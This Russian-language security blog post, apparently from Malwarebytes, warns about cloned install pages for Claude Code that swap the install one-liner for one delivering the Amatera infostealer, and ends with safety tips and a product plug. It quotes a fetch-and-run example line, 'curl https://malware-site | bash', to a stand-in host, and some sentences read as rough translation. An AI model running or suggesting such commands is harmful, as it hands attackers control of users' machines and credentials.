Злоумышленники клонируют страницы установки популярных инструментов, таких как Claude Code, и заменяют однострочные команды установки вредоносным ПО, в основном для кражи паролей, файлов cookie, сеансов и доступа к средам разработчиков.
Современные руководства по установке часто рекомендуют скопировать одну команду, например curl https://malware-site | bash в терминал и нажмите Enter. Эта привычка превращает веб-сайт в пульт дистанционного управления: любой скрипт, находящийся по этому URL-адресу, запускается с вашими правами доступа, часто правами администратора.
Исследователи обнаружили, что злоумышленники злоупотребляют этим рабочим процессом, оставляя все неизменным и меняя только место подключения этой одной строчки. Для многих неспециалистов, которые только начали использовать ИИ и инструменты для разработчиков, этот метод кажется нормальным, поэтому они не проявляют настороженности.
Но в сущности это сводится к «я доверяю этому домену», а это не лучшая идея, если вы не уверены, что ему можно доверять.
Обычно все происходит так. Кто-то вводит в поисковике «установка Claude Code» или «Claude Code CLI», видит вверху спонсорский результат с правдоподобным URL-адресом и кликает по нему, не задумываясь.
Но эта реклама ведет на клонированную страницу с документацией или загрузкой: тот же логотип, та же боковая панель, тот же текст и знакомая кнопка «Копировать» рядом с командой установки. Во многих случаях любой другой ссылки, по которой вы нажимаете на этой поддельной странице, незаметно перенаправляет вас на настоящий сайт поставщика, поэтому ничего больше не выглядит подозрительно.
Подобно атакам ClickFix, этот метод называется InstallFix. Пользователь запускает код, который заражает его собственный компьютер под ложным предлогом, и полезной нагрузкой обычно является программа для кражи информации.
Основной полезной нагрузкой в этих случаях InstallFix с темой Claude Code является инфостилер под названием Amatera. Он фокусируется на данных браузера, таких как сохраненные пароли, файлы cookie, токены сеанса, данные автозаполнения и общая системная информация, которая помогает злоумышленникам составить профиль устройства. С помощью этого они могут перехватить веб-сессии и войти в облачные панели управления и внутренние панели администратора, даже не зная вашего фактического пароля. В некоторых отчетах также упоминается интерес к криптокошелькам и другим счетам с высокой стоимостью.
Windows Mac
Кампания, основанная на коде Claude, обнаруженная исследователями, была рассчитана как на Mac Windows на Mac .
В macOS вредоносный однострочный скрипт обычно загружает скрипт второго этапа с домена, контролируемого злоумышленником, который часто зашифрован с помощью base64, чтобы на первый взгляд выглядеть шумным, но безобидным. Затем этот скрипт загружает и запускает двоичный файл с еще одного домена, удаляя атрибуты и делая его исполняемым перед запуском.
В Windows была замечена команда, порождающая cmd.exe, который затем вызывает mshta.exe с удаленным URL-адресом. Это позволяет вредоносной программе работать как доверенный бинарный файл Microsoft, а не как очевидный случайный исполняемый файл. В обоих случаях на экране ничего особенного не появляется: вы думаете, что просто установили инструмент, а на самом деле реальная полезная нагрузка тихо начинает свою работу в фоновом режиме.
Как оставаться в безопасности
В связи с широким распространением программ ClickFix и InstallFix, которые, судя по всему, не исчезнут в ближайшее время, важно быть внимательным, осторожным и защищенным.
- Не торопитесь. Неспешите выполнять инструкции на веб-странице или в командной строке, особенно если вам предлагается запустить команды на вашем устройстве или скопировать и вставить код. Перед запуском команды проанализируйте, что она будет делать.
- Избегайте запуска команд или скриптов из ненадежных источников. Никогда незапускайте код или команды, скопированные с веб-сайтов, из электронных писем или сообщений, если вы не доверяете источнику и не понимаете цель действия. Проверяйте инструкции самостоятельно. Если веб-сайт предлагает вам выполнить команду или техническое действие, прежде чем приступить к этому, проверьте официальную документацию или обратитесь в службу поддержки.
- Ограничьте использование функции «копировать-вставить» для команд.Ввод команд вручнуювместо копирования и вставки может снизить риск непреднамеренного запуска вредоносных программ, скрытых в скопированном тексте.
- Защитите свои устройства. Используйтеактуальноеантивирусное решение, работающее в режиме реального времени, с компонентом веб-защиты.
- Изучайте развивающиеся методы атак.Понимание того, что атаки могут исходить из неожиданных источников и развиваться, помогает сохранять бдительность. Продолжайте читать наш блог!
Совет от профессионала:знаете ли вы, что бесплатная программа Malwarebytes Browser Guard предупреждает вас, когда веб-сайт пытается скопировать что-то в ваш буфер обмена?
Мы не просто сообщаем об угрозах - мы их устраняем
Риски кибербезопасности не должны выходить за рамки заголовка. Загрузите Malwarebytes сегодня, чтобы предотвратить угрозы на своих устройствах.
